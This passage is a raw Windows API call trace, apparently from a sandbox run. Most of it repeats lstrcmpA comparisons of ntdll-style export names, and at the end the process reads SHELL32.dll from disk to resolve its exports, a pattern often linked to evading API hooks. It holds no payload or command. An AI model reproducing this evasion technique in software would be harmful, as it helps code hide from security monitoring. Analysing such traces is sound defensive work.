lpString2="A_SHAInit") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0136.118] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.119] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0136.120] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0136.120] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.120] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.120] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.120] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.121] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.121] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0136.121] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.122] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0136.122] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0136.122] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0136.122] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0136.122] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.122] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.122] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0136.123] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0136.123] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0136.123] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0136.123] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0136.123] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.123] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.123] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0136.124] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0136.124] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0136.124] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0136.125] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0136.125] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0139.709] GetProcessHeap () returned 0x470000 [0139.709] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4155040 | out: hHeap=0x470000) returned 1 [0139.719] GetProcessHeap () returned 0x470000 [0139.720] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489e10 [0140.050] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0140.050] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0140.050] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0140.050] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0140.051] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0140.051] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0140.051] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0140.051] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0140.051] GetProcessHeap () returned 0x470000 [0140.051] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1587258) returned 0x4150040 [0140.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0140.327] ReadFile (in: hFile=0x140, lpBuffer=0x4150040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4150040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0145.649] CloseHandle (hObject=0x140) returned 1 [0145.650] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0145.650] lstrcmpA (lpString1="AssocCreateForClasses", 